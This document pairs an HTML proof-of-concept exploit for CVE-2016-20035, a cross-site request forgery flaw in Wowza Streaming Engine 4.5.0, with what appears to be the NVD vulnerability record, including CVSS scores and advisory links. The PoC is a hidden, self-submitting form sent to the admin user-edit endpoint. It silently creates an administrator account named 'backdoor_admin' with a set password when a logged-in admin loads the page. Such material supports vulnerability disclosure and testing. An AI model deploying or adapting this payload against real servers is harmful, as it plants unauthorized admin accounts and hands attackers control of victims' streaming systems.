CVE-2016-20035

<!-- CSRF PoC for CVE-2016-20035: Wowza Streaming Engine User Edit CSRF --> <!DOCTYPE html> <html> <head> <title>Wowza Streaming Engine CSRF PoC</title> </head> <body> <h2>CVE-2016-20035 CSRF Attack PoC</h2> <p>This PoC demonstrates the CSRF vulnerability in Wowza Streaming Engine 4.5.0</p> <p>Target: Create a new admin account on the Wowza server</p> <!-- Auto-submit form targeting Wowza user edit endpoint --> <form id="csrfForm" action="http://target-server:8080/admin/userEdit.html" method="POST" style="display:none;"> <!-- CSRF vulnerability: No CSRF token validation --> <input type="hidden" name="moduleName" value="users" /> <input type="hidden" name="operation" value="add" /> <input type="hidden" name="userName" value="backdoor_admin" /> <input type="hidden" name="password" value="P@ssw0rd123!" /> <input type="hidden" name="confirmPassword" value="P@ssw0rd123!" /> <input type="hidden" name="description" value="CSRF Created Account" /> <input type="hidden" name="userRoles" value="admin" /> <input type="hidden" name="publishingPassword" value="" /> <input type="hidden" name="enabled" value="true" /> <input type="hidden" name="saved" value="true" /> </form> <script> // Auto-submit the form when page loads document.getElementById('csrfForm').submit(); console.log('CSRF request sent to target server'); </script> </body> </html>

{"cve": {"id": "CVE-2016-20035", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:50.693", "lastModified": "2026-03-19T14:17:08.137", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wowza Streaming Engine 4.5.0 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions by crafting malicious web pages. Attackers can trick logged-in administrators into visiting a malicious site that submits POST requests to the user edit endpoint to create new admin accounts with arbitrary credentials."}, {"lang": "es", "value": "Wowza Streaming Engine 4.5.0 contiene una vulnerabilidad de falsificación de petición en sitios cruzados que permite a los atacantes realizar acciones administrativas mediante la elaboración de páginas web maliciosas. Los atacantes pueden engañar a los administradores que han iniciado sesión para que visiten un sitio malicioso que envía peticiones POST al punto final de edición de usuario para crear nuevas cuentas de administrador con credenciales arbitrarias."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wowza:streaming_engine:4.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "FDC6B630-F0E9-4F80-8EF2-112FAB0A46C2"}]}]}], "references": [{"url": "http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5341.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/40134", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/wowza-streaming-engine-csrf-via-user-edit-endpoint", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}